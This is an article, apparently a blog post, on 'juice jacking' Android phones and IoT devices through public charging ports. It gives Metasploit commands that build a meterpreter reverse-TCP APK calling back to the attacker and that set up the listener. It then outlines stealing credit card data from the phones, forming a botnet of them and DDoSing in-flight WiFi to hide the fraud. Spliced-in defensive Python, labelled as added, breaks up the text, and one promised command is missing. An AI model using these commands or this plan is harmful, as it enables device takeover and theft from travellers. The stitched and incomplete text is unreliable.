Exploiting Devices using Juice Jacking to compromise IoT

By Nikhil Dutta


Juice jacking is a Trojan exploit used to gain unauthorized access to mobile devices and retrieve information. This exploit consists of two modular components: a Remote Access Trojan (RAT) and a Metasploit payload. The Metasploit payload is an .apk file which is used to manipulate connections to a network on that device. The RAT is then executed to gain complete control of the device and retrieve valuable information from it. The most interesting aspect of juice jacking is the way it spreads: to improve efficiency, devices today have merged the charging port and the data transfer port. Furthermore, because IoT devices follow the same concept, they can easily be exploited as a gateway for the Trojan to spread to other IoT devices.

The juice jacking exploit relies on physical transfer, but since the medium of transfer is masked by the charging port, it provides a very easy gateway to the devices. Documented cases of the exploit have been publicized, for example at locations like airports or train stations, where travelers are targeted primarily through one social engineering characteristic that is very common and can even be generalized to: “My phone is out of charge. Is there a charging point which I can use for a while?” This has allowed attackers to use the exploit for their benefit. With juice jacking, the vulnerability or attack vector is the phone’s USB port; the exposure factor depends on the user’s awareness of this possible attack method and on their phone’s battery life. When these two factors come together, the unsuspecting user plugs their phone into a malicious system, thus allowing the attack to take place. This can particularly affect business professionals with access to sensitive data on their phones.

There is no reason to presume the kiosks filling airports and other public places are inherently malicious. But with a little mischief in mind, a few pieces of targeted malware can essentially take over entire systems without the user knowing how and when. A combination of a Remote Access Trojan (RAT) and a Metasploit payload is equipped to empty your accounts.


The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

Metasploit soon opens a connection with the target Android phone, where you can do things like record from their microphone, take a picture with their camera, and look at their calls, contacts, and address.

This requires a connection between the Metasploit console and the target machine. The gateway is provided by a payload which can be generated by typing the following command in the msfconsole:

msfpayload android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /root/Desktop/payload.apk

Payload.apk is the final linchpin of the attack. It serves as the portal between the device and the hacker’s terminal. Once both devices are connected to the same network, here the onboard WiFi, the payload can be triggered using a simple autorun program or another RAT.

First, we will open the Metasploit console by typing the following:

msfconsole

Once the Metasploit console is open, we will type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Now you should have the payload all set. Next, we will set up the connections.

set lhost (your lan ip address)

Now your local host is set up, but we still need to set up the port.

set lport 8080
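Seen from the network side, the handler configured above waits on a LAN address, so the callback appears as one WiFi client connecting to another client on the same subnet. The following added example, which is not part of the original post, flags such flows; the function name, addresses and record layout are assumptions made for illustration.

```python
import ipaddress

# Constructed flow records (src, dst, dst_port, proto), as a WiFi controller
# or gateway might export them. All addresses are made up for this example.
SAMPLE_FLOWS = [
    ("10.20.0.51", "10.20.0.1", 53, "udp"),      # client -> gateway DNS
    ("10.20.0.51", "203.0.113.10", 443, "tcp"),  # client -> internet
    ("10.20.0.51", "10.20.0.77", 8080, "tcp"),   # client -> another client
    ("10.20.0.63", "10.20.0.77", 8080, "tcp"),   # second client, same peer
    ("10.20.0.90", "10.20.0.10", 80, "tcp"),     # client -> captive portal
]


def find_peer_callbacks(flows, client_net, infrastructure, min_clients=1):
    """Return {(listener_ip, port): [client_ips]} for TCP connections that
    stay inside the client subnet and do not involve known infrastructure
    (gateway, portal). Several clients calling one peer is the stronger
    signal, so min_clients can be raised to reduce noise."""
    net = ipaddress.ip_network(client_net)
    infra = {ipaddress.ip_address(a) for a in infrastructure}
    hits = {}
    for src, dst, port, proto in flows:
        s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if proto != "tcp" or s not in net or d not in net:
            continue  # only client-to-client TCP is of interest here
        if s in infra or d in infra:
            continue  # traffic to or from gateway/portal is expected
        hits.setdefault((dst, port), set()).add(src)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_clients}


if __name__ == "__main__":
    found = find_peer_callbacks(
        SAMPLE_FLOWS, "10.20.0.0/24", ["10.20.0.1", "10.20.0.10"]
    )
    for (ip, port), clients in found.items():
        print(f"peer listener {ip}:{port} contacted by {clients}")
```

Enabling client isolation on the access point blocks this client-to-client path entirely, which leaves the check above as a way to confirm the isolation is actually in effect.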

Thus, when the user connects to the plane’s onboard WiFi, the payload is inadvertently triggered. With that achieved, the attacker can access all sorts of data, in this case saved credit card credentials, from his msfconsole terminal using the following command.


This should soon open a connection with the target Android phone, where you can do things like record from their microphone, take a picture with their camera, and look at their calls, contacts, and address.
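The capabilities listed here, and earlier in the description of Metasploit, give a defender something to audit: an installed app that combines network access with microphone, camera, call log and contacts permissions deserves review. The following added example is not part of the original post; the mapping from capabilities to Android permissions, the `aapt dump permissions` style input and the package names are assumptions.

```python
import re

# Assumed mapping from the capabilities named above to Android permissions.
RISKY = {
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.CAMERA": "camera",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.READ_CONTACTS": "contacts",
}
NETWORK = "android.permission.INTERNET"

# Constructed permission listing for two made-up packages.
SAMPLE = """\
package: com.example.flashlight
uses-permission: name='android.permission.CAMERA'
package: com.example.updater
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.READ_CONTACTS'
"""

# Accepts both "name='x.y.Z'" and bare "x.y.Z" after the key.
PERM_RE = re.compile(r"^uses-permission:\s*(?:name=')?([\w.]+)'?")


def parse_permissions(text):
    """Return {package: set(permissions)} from the listing."""
    apps, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            current = line.split(":", 1)[1].strip()
            apps[current] = set()
        elif current and (m := PERM_RE.match(line)):
            apps[current].add(m.group(1))
    return apps


def flag_surveillance_capable(apps, threshold=3):
    """Flag packages with network access plus >= threshold risky capabilities."""
    findings = {}
    for pkg, perms in apps.items():
        caps = sorted(RISKY[p] for p in perms if p in RISKY)
        if NETWORK in perms and len(caps) >= threshold:
            findings[pkg] = caps
    return findings
```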

Now it is a matter of time and some data mining techniques to find credit card credentials on the phone. With this done, the next stage is overloading the server so that it shuts down, keeping the user in the dark about any unauthorized credit card activity taking place at the same time. This is where the RAT digs in.

Remote Access Trojan (RAT)

RAT stands for Remote Access Trojan. It is a piece of software or a program which a hacker uses to get complete control of your computer. It can be propagated in the form of images, videos or any other files. There are some RATs that even your antivirus software cannot detect.

This attack works best if multiple devices are targeted. All of these targets, connected to the same network, form a botnet. Once the credit card information is accessed, the RAT in the phones can be triggered to use this botnet and send out a DDoS attack on the WiFi. This makes for the perfect opportunity for the hacker to empty the bank accounts. By the time the victims land, they have lost a large part of their bank balance and it is too late to do anything.

Extension of payload to IoT

The Metasploit payload is used to control the network connection of the device. This functionality can further be used to create a DoS attack when passed to a string of interconnected devices. Since most devices have migrated to USB-based charging, this has paved the way for other devices to include USB-based charging in their specifications. This also includes numerous IoT devices.

This gives a chance for the technique described above to be used on the devices that make up an IoT system. When applied to specifically targeted devices, the Metasploit payload could compromise a device’s connectivity with other devices in the system. The only way to solve the problem would be to disconnect it from the system.

IoT devices are often used by novice or technologically inexperienced users. At the very least, IoT was designed for inexperienced users. This creates a huge opening for the juice jacking technique to be employed. It is common knowledge that IoT devices require constant updates, which are not necessarily limited to software but also include hardware. Cell phones in the past decade have had processing power equivalent to a small-spec computer, and the same holds for IoT devices. The growing push to promote the use of IoT brings these aspects into the picture, thus opening avenues to exploit them. The recent use of the Raspberry Pi to hold exploits can also be a way to transfer the payload, as the Raspberry Pi was designed for ease of integration with other devices, which by fundamental definition are IoT.

The Metasploit payload, when transferred to the device, gains control of the network connectivity of that particular device. This can be used to manipulate incoming and outgoing traffic from the device. Since communication between devices has improved and now embodies encapsulation, disrupting the packets would provide another interesting challenge. But what comes easily is the control of outgoing traffic and the disruption of the communication link between the devices. This would thus cause an incremental DoS attack on the IoT system.

